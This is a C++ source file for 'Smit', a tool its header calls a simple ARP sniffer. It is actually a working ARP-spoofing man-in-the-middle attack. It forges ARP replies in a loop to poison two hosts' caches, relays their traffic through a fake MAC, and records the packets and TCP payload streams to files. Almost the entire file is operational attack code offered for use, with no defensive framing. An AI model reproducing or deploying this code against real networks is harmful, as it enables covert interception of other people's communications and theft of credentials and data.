/****************************************************************
*																*
*		Simple ARP sniffer										*
*		by IhaQuer@IRCnet										*
*		report bugz to ihaquer@gmx.de							*
*																*
****************************************************************/




extern "C" {
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <pcap.h>
#include <libnet.h>
#include <sys/times.h>
}


//#define __DEBUG
#define __BUGGYPCAP


#define IP_LEN 4
#define MAC_LEN 6

#define TMPBUFLEN 256
#define SNAPBUFLEN 1024*1024


const u_char ethernull[6] = {0,0,0,0,0,0};
const u_char etherbcast[6] = {255,255,255,255,255,255};


enum MyRes {SUCC=0, FAIL};
enum SaveModes {DIRECT, BUFFER, NOSAVE};

typedef u_char* IP;
typedef u_char* MAC;


//		CONFIG:
#define PROM_MODE 1

#define ARP_TIMEOUT 128
#define ARP_RECACHE 30
#define ARP_RECACHE_UNJAM 10000
#define NUMUNJAM 2

#define POOL_TIMEOUT 1000

u_char* sniffdevice;
int doloop;
int savetcp = 0;


//		save to file:
char savefile[TMPBUFLEN] = {"sniff.txt"};
char* smit_ver = "0.14";



//		byte copy
void bcpy(const void* dst, const void* src, int n)
{
		register u_char* d = (u_char*)dst;
		register u_char* s = (u_char*)src;

		while(n--)
			*d++=*s++;
}


//		byte compare
int bcomp(const void* dst, const void* src, int n)
{
		register u_char* d = (u_char*)dst;
		register u_char* s = (u_char*)src;
		int r=1;

		while(n) {
			r *= (*d++ == *s++);
			n--;
		}

return r;
}


//		reads IP
void get_ip(char* ipstr, u_char* ip)
{
		int i=0;
		char* ptr = strtok(ipstr, ".");
		while(ptr && i<4) {
			ip[i] = (u_char)atoi(ptr);
			ptr = strtok(NULL, ".");
			i++;
		}
}


//		prints MAC
void print_mac(u_char* mac)
{
		printf("\nMAC: %x:%x:%x:%x:%x:%x ", (unsigned)mac[0], (unsigned)mac[1], (unsigned)mac[2], (unsigned)mac[3], (unsigned)mac[4], (unsigned)mac[5]);
}


//		sprints MAC
char* sprint_mac(u_char* mac)
{
static char tmpbuf[TMPBUFLEN];

		sprintf(tmpbuf, "%x:%x:%x:%x:%x:%x", (unsigned)mac[0], (unsigned)mac[1], (unsigned)mac[2], (unsigned)mac[3], (unsigned)mac[4], (unsigned)mac[5]);

return tmpbuf;
}


//		prints IP
void print_ip(u_char* ip)
{
		printf("\nIP: %u.%u.%u.%u ", (unsigned)ip[0], (unsigned)ip[1], (unsigned)ip[2], (unsigned)ip[3]);
}


//		sprints IP
char* sprint_ip(u_char* ip)
{
static char tmpbuf[TMPBUFLEN];

		sprintf(tmpbuf, "%u.%u.%u.%u", (unsigned)ip[0], (unsigned)ip[1], (unsigned)ip[2], (unsigned)ip[3]);

return tmpbuf;
}


//		queries network interface for given IP's MAC
MyRes arp_query(IP ip, MAC mac, int mode=0)
{
struct sockaddr_in sin;
char errbuf[TMPBUFLEN];
MyRes res = FAIL;

//		try select device
		if(libnet_select_device(&sin, (u_char **)&sniffdevice, (u_char*)errbuf) != 1) {
			printf("\nERROR selecting device");
		}
//		device ok, opem link interface
		else {
			libnet_link_int* mylink;
			mylink = libnet_open_link_interface((char*)sniffdevice, (char*)errbuf);
			if(mylink == NULL) {
				printf("\nERROR opening link interface: %s", errbuf);
			}
			else {
				pcap_t* myrawp = pcap_open_live((char*)sniffdevice, 1500, PROM_MODE, ARP_TIMEOUT, (char*)errbuf);
				if(myrawp == NULL) {
					printf("\nERROR opening RAW for ARP");
				}
//		ok try ARPing it out :-)
				else {
//		read my mac
					ether_addr* my_ether;
					u_char mymac[MAC_LEN];
					u_char myip[IP_LEN];			

					bcpy(myip, ip, IP_LEN);

					if(mode) {
						long mip = libnet_get_ipaddr(mylink, sniffdevice, errbuf);
						if(!mip)
							printf("\nERROR query my IP addr: %s", errbuf);
						else {
							long nip = htonl(mip);
							bcpy(myip, (char*)&nip, IP_LEN);
						}
					}
					print_ip(myip);
					my_ether = libnet_get_hwaddr(mylink, sniffdevice, errbuf);
					if (!my_ether) {
						printf("\nERROR reading my HWADDR: %s", errbuf);
					}
					else {
						bcpy(mymac, (u_char*)my_ether, 6);
//						print_mac(mymac);
						printf("\nQuerying MAC for %s", sprint_ip(ip));
						u_char buf[LIBNET_ARP_H+LIBNET_ETH_H+1];
						libnet_build_ethernet((u_char *)etherbcast, mymac, ETHERTYPE_ARP, NULL, 0, buf);
						libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REQUEST, mymac, myip, (u_char *)ethernull, ip, NULL, 0, buf+LIBNET_ETH_H);
						libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
//		ok now loop for arp reply
						pcap_pkthdr pc_hdr;
						int maxpkt = 5;
						while(maxpkt) {
							u_char* pkt = (u_char*)pcap_next(myrawp, &pc_hdr);
							if(!pkt)
								if(maxpkt)
									maxpkt--;
								else
									break;
							else {
								maxpkt--;
								libnet_ethernet_hdr* ehdr = (libnet_ethernet_hdr*)pkt;
								if(ntohs(ehdr->ether_type) == ETHERTYPE_ARP) {
									libnet_arp_hdr* ahdr = (libnet_arp_hdr*)(pkt + LIBNET_ETH_H);
									if(ntohs(ahdr->ar_op) == ARPOP_REPLY && bcomp(ahdr->ar_spa, ip, 4)) {
										bcpy(mac, ahdr->ar_sha, MAC_LEN);
										printf("\nGOT MAC %s for %s", sprint_mac(mac), sprint_ip(ahdr->ar_spa));
										res = SUCC;
										break;
									}
								}
							}
						}
						if(!maxpkt)
							printf("\nERROR ARP timeout");
					}

					pcap_close(myrawp);
				}
				libnet_close_link_interface(mylink);
			}
		}

return res;
}


//		error ARPing
void arp_fail(IP ip)
{
		printf("\nERROR while sending ARP for %s\n", sprint_ip(ip));
		exit(1);
}


//		makes random mac
void make_mac(u_char* mac)
{
		mac[0]=0;
		mac[1]=0;
		for(int i=0; i<4; i++)
			mac[2+i] = (u_char)((rand()%254)+1);
}


//		relay packet comming from mac1 over macrel to mac2
MyRes relay_packet(libnet_link_int* mylink, u_char* pkt, int pktlen, u_char* ip1, u_char* mac1, u_char* ip2, u_char* mac2, u_char* macrel)
{
static char fname[TMPBUFLEN];
static char buf[TMPBUFLEN];

			libnet_ethernet_hdr* ehdr = (libnet_ethernet_hdr*)pkt;
			libnet_ip_hdr* ihdr = (libnet_ip_hdr*)(pkt + LIBNET_ETH_H);

			bcpy(ehdr->ether_dhost, mac2, MAC_LEN);
			bcpy(ehdr->ether_shost, macrel, MAC_LEN);

#ifdef __BUGGYPCAP
			if(libnet_write_link_layer(mylink, sniffdevice, pkt, pktlen-4) == -1)
#else
			if(libnet_write_link_layer(mylink, sniffdevice, pkt, pktlen) == -1)
#endif
				printf("ERROR: relay_packet()");

//		lame TCP data collecting
			libnet_tcp_hdr* thdr = (libnet_tcp_hdr*)(pkt + LIBNET_ETH_H + LIBNET_IP_H);

			if((thdr->th_flags & TH_PUSH) && (thdr->th_flags & TH_ACK) && savetcp) {
				strcpy(fname, sprint_ip((u_char*)&(ihdr->ip_src.s_addr)));
				strcat(fname, "_");
				sprintf(buf, "%u-", (unsigned)ntohs(thdr->th_sport));
				strcat(fname, buf);
				strcat(fname, sprint_ip((u_char*)&(ihdr->ip_dst.s_addr)));
				strcat(fname, "_");
				sprintf(buf, "%u.dat", (unsigned)ntohs(thdr->th_dport));
				strcat(fname, buf);

//		hmm extract stream data
				u_char* tcp_data = (pkt + LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H);
				int tcp_data_len = pktlen-(LIBNET_ETH_H + LIBNET_IP_H + LIBNET_TCP_H)-8;

				FILE* fp = fopen(fname, "a");
				if(fp && tcp_data_len > 0) {
					fwrite(tcp_data, 1, tcp_data_len, fp);
					fclose(fp);
				}

#ifdef __DEBUG
				printf("\nTCP: %s LEN %d PKTL %d\n", fname, tcp_data_len, pktlen);
#endif
			}

return SUCC;
}


//		ARP jammer:
MyRes arp_jammer(libnet_link_int* mylink, u_char* ip1, u_char* mac1, u_char* ip2, u_char* mac2, u_char* macrel)
{
		u_char* pkt;

		if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1) {
			printf("\nlibnet_init_packet failed");
			return FAIL;
		}

		while(1) {
			u_char buf[TMPBUFLEN];
//		create ARP reply from mac2/ip2 to mac1/ip1
			libnet_build_ethernet(mac1, macrel, ETHERTYPE_ARP, NULL, 0, buf);
			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY, macrel, ip2, mac1, ip1, NULL, 0, buf+LIBNET_ETH_H);
			libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
//		create ARP reply from mac1/ip1 to mac2/ip2
			libnet_build_ethernet(mac2, macrel, ETHERTYPE_ARP, NULL, 0, buf);
			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY, macrel, ip1, mac2, ip2, NULL, 0, buf+LIBNET_ETH_H);
			libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
			
			sleep(ARP_RECACHE);
		}

return SUCC;
}

//		ARP dejammer:
MyRes arp_unjammer(libnet_link_int* mylink, u_char* ip1, u_char* mac1, u_char* ip2, u_char* mac2, u_char* macrel)
{
		u_char* pkt;

		if(libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &pkt) == -1) {
			printf("\nlibnet_init_packet failed");
			return FAIL;
		}

		printf("\nDEJAMMING");
		fflush(stdout);
		for(int i=0; i<NUMUNJAM; i++) {
			u_char buf[TMPBUFLEN];
//		create ARP request from mac2/ip2 to mac1/ip1
			libnet_build_ethernet((u_char*)etherbcast, mac2, ETHERTYPE_ARP, NULL, 0, buf);
			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REQUEST, mac2, ip2, (u_char*)ethernull, ip1, NULL, 0, buf+LIBNET_ETH_H);
			libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
//		create ARP reply from mac1/ip1 to mac2/ip2
			libnet_build_ethernet((u_char*)etherbcast, mac1, ETHERTYPE_ARP, NULL, 0, buf);
			libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REQUEST, mac1, ip1, (u_char*)ethernull, ip2, NULL, 0, buf+LIBNET_ETH_H);
			libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
			usleep(ARP_RECACHE_UNJAM);
		}

return SUCC;
}


//		unjam on ctrl-c
void stopme(int ret)
{
		doloop = 0;
		printf("\nWAIT, dejamming...");
		fflush(stdout);
}


//		prints usage
void usage(char** argv)
{
		printf("\nUSAGE %s <IP point 1> <IP point 2> [options]", argv[0]);
		printf("\n\nOptions:");
		printf("\n -N no save");
		printf("\n -q query mode, query ARP and quit");
		printf("\n -b buffer mode (default: direct write)");
		printf("\n -s <buffer size> (default: %d)", SNAPBUFLEN);
		printf("\n -f <filename> (default: sniff.txt)");
		printf("\n -M MAC force MAC");
		printf("\n -m <mode> save mode: RAW, PKT");
		printf("\n -T save tcp streams (only direct to disk)");
		printf("\n\n");
		exit(1);
}


//		reads MAC
void get_mac(u_char* mac, char* optarg)
{
		int i=0;
		char* ptr = strtok(optarg, ":-");
		while(ptr) {
			unsigned nmb;
			sscanf(ptr, "%x", &nmb);
			mac[i] = (u_char)nmb;
			ptr = strtok(NULL, ":-");
			i++;
		}
}


//		lets go :-)
int main(int argc, char** argv)
{
		if(argc < 3) {
			usage(argv);
			return 1;
		}

//		print version
		printf("\nSmit v %s", smit_ver);

//		parse cmd
		int opt;
		extern char* optarg;

//		read IPs from argv:
		u_char ip1[IP_LEN];
		get_ip(argv[1], ip1);
		u_char ip2[IP_LEN];
		get_ip(argv[2], ip2);
		srand(time(NULL));

//		set defaults:
		int savebuflen = SNAPBUFLEN;
		SaveModes savemode = DIRECT;
		u_char mac1[MAC_LEN];
		u_char mac2[MAC_LEN];
		u_char macrel[MAC_LEN];
		int havemac = 0;
		int querymode = 0;
		int savestyle = 0; // raw

		while ((opt = getopt(argc, argv, "qbs:f:M:Nm:T")) != EOF) {
			switch (opt) {

			case 'f':
				strcpy(savefile, optarg);
				break;

			case 's':
				savebuflen = atoi(optarg);
				if(savebuflen < 1500)
					usage(argv);
				break;

			case 'b':
				savemode = BUFFER;
				break;
			
			case 'q':
				querymode = 1;
				break;

			case 'N':
				savemode = NOSAVE;
				break;
			
			case 'm':
				if(!strcasecmp(optarg, "pkt"))
					savestyle = 1;

			case 'T':
				savetcp = 1;
				break;

			case 'M':
				if(!havemac) {
					get_mac(mac1, optarg);
					printf("\nForcing MAC1 to be %s", sprint_mac(mac1));
					havemac++;
				}
				else if(havemac == 1){
					get_mac(mac2, optarg);
					printf("\nForcing MAC2 to be %s", sprint_mac(mac2));
					havemac++;
				}
				else {
					get_mac(macrel, optarg);
					printf("\nForcing MACREL to be %s", sprint_mac(macrel));
					havemac++;
				}
				break;

	        case '?':
		    default:
				usage(argv);
				break;
			}
		}

//		ok let us find the MACs for ip1, ip2

		if(!havemac)
//		windose mode
			if(arp_query(ip1, mac1, 1) != SUCC)
//		ok try lame cisco style
				if(arp_query(ip1, mac1) != SUCC)
					arp_fail(ip1);
		
		if(havemac < 2)
			if(arp_query(ip2, mac2, 1) != SUCC)
				if(arp_query(ip2, mac2) != SUCC)
					arp_fail(ip2);

//		query only?
		if(querymode) {
			printf("\n");
			return 0;
		}

//		ok now have both MACs
		printf("\nNow spoofing %s at %s <-> ", sprint_ip(ip1), sprint_mac(mac1));
		printf("%s at %s", sprint_ip(ip2), sprint_mac(mac2));

		printf("\n\nRelay mac set to: ");
		if(havemac < 3)
			make_mac(macrel);
		printf("%s", sprint_mac(macrel));

//		save to file?
		FILE* sfp;
		u_char* savebuf;
		u_char* saveptr;

		if(savemode == BUFFER) {
			savebuf = saveptr = new u_char[savebuflen];
			if(!savebuf) {
				printf("\nERROR allocating buffer memory");
				exit(2);
			}
		}
		else if(savemode == DIRECT) {
			sfp = fopen(savefile, "w");
			if(!sfp)
				printf("\nERROR saving to file");
		}

//		try select device
		u_char errbuf[TMPBUFLEN];
		struct sockaddr_in sin;
		if(libnet_select_device(&sin, (u_char **)&sniffdevice, (u_char*)errbuf) != 1) {
			printf("\nERROR selecting device");
		}

//		now setup the relay
		libnet_link_int* mylink = libnet_open_link_interface((char*)sniffdevice, (char*)errbuf);

		if(mylink == NULL) {
			printf("\nERROR opening link interface: %s", errbuf);
		}
		else {
			pcap_t* myrawp = pcap_open_live((char*)sniffdevice, 1500, PROM_MODE, POOL_TIMEOUT, (char*)errbuf);
			if(myrawp == NULL) {
				printf("\nERROR opening RAW for ARP");
			}
			else {
				printf("\nEntering relay mode :-)\n\n");

				int maxpkt = 0;
				int touts = 0;

//		fork arp jammer:
				pid_t jpid = fork();
				if(!jpid) {
//		send fake arps:
					arp_jammer(mylink, ip1, mac1, ip2, mac2, macrel);
					return 0;
				}

				signal(SIGINT, stopme);
				signal(SIGKILL, stopme);
				doloop = 1;
				int savedlen = 0;
				int savedpkt = 0;

//		relay loop:
				while(doloop) {
					pcap_pkthdr pc_hdr;
					u_char* pkt = (u_char*)pcap_next(myrawp, &pc_hdr);
					int saveme = 0;

					if(pkt) {
						libnet_ethernet_hdr* ehdr = (libnet_ethernet_hdr*)pkt;
						int pktlen = pc_hdr.caplen;

//		check what packet type:
						if(ntohs(ehdr->ether_type) == ETHERTYPE_IP) {
//		process IP packets:
//							printf("\nETH IP: MS=%s", sprint_mac(ehdr->ether_shost));
//							printf(" MD=%s", sprint_mac(ehdr->ether_dhost));
							if(bcomp(ehdr->ether_dhost, macrel, MAC_LEN) && bcomp(ehdr->ether_shost, mac1, MAC_LEN)) {
//		ok IP from mac1 to relmac
								relay_packet(mylink, pkt, pktlen, ip1, mac1, ip2, mac2, macrel);
								saveme++;
							}
							else if(bcomp(ehdr->ether_dhost, macrel, MAC_LEN) && bcomp(ehdr->ether_shost, mac2, MAC_LEN)) {
//		IP from mac2 to relmac
								relay_packet(mylink, pkt, pktlen, ip2, mac2, ip1, mac1, macrel);
								saveme++;
							}
						}
						else if(ntohs(ehdr->ether_type) == ETHERTYPE_ARP) {
//		process ARP packets:
							libnet_arp_hdr* ahdr = (libnet_arp_hdr*)(pkt + LIBNET_ETH_H);

//		hmm windose gets confused from broadcast requests
							if(ntohs(ahdr->ar_op) == ARPOP_REQUEST && bcomp(ehdr->ether_dhost, etherbcast, MAC_LEN)) {
//		mac1 requested ARP something to bcast :-(
								if(bcomp(ehdr->ether_shost, mac1, MAC_LEN)) {
									u_char buf[TMPBUFLEN];
									libnet_build_ethernet(mac2, macrel, ETHERTYPE_ARP, NULL, 0, buf);
									libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY, macrel, ip1, mac2, ip2, NULL, 0, buf+LIBNET_ETH_H);
									libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
								}
//		mac2 requested ARP something to bcast :-(
								else if(bcomp(ehdr->ether_shost, mac2, MAC_LEN)) {
									u_char buf[TMPBUFLEN];
									libnet_build_ethernet(mac1, macrel, ETHERTYPE_ARP, NULL, 0, buf);
									libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4, ARPOP_REPLY, macrel, ip2, mac1, ip1, NULL, 0, buf+LIBNET_ETH_H);
									libnet_write_link_layer(mylink, sniffdevice, buf, LIBNET_ARP_H + LIBNET_ETH_H);
								}
							}
						}
//		ok now time for saving it ?
						if(saveme) {
							savedlen += pktlen;
							savedpkt++;

							if(savemode == BUFFER) {
								if(savedlen+2*sizeof(int) >= savebuflen) {
									printf("\nSave buffer full, exiting");
									doloop = 0;
									break;
								}
								else {
									if(savestyle) {
										*((int*)saveptr) = savedpkt;
										*(((int*)saveptr)+1) = pktlen;
										saveptr += 2*sizeof(int);
									}
									bcpy(saveptr, pkt, pktlen);
									saveptr += pktlen;
								}
							}
							else if(savemode == DIRECT) {
								if(savestyle) {
									fwrite(&savedpkt, sizeof(int), 1, sfp);
									fwrite(&pktlen, sizeof(int), 1, sfp);
								}
								fwrite(pkt, 1, pktlen, sfp);
							}
						}
					}
//		ups, timeout:
					else
						touts++;

					if(!(maxpkt % 32)) {
						printf("\rPKTS/TOUT/BUF: %d %d %d        ", maxpkt, touts, savedlen);
						fflush(stdout);
					}

					maxpkt++;
				}
//		CLEANUP:

//		kill jamer:
				kill(jpid, SIGTERM);
//		dejam:
				arp_unjammer(mylink, ip1, mac1, ip2, mac2, macrel);
				pcap_close(myrawp);
			}
			libnet_close_link_interface(mylink);
		}

//		close save file :-)
		if(savemode == BUFFER) {
			if(!(sfp = fopen(savefile, "w")))
				printf("\nERROR saving capture buffer");
			else {
				fwrite(savebuf, 1, saveptr-savebuf, sfp);
				fclose(sfp);
			}
			delete savebuf;
		}

		if(savemode == DIRECT)
			fclose(sfp);
		
		printf("\nREADY");
		printf("\n");
return 0;
}
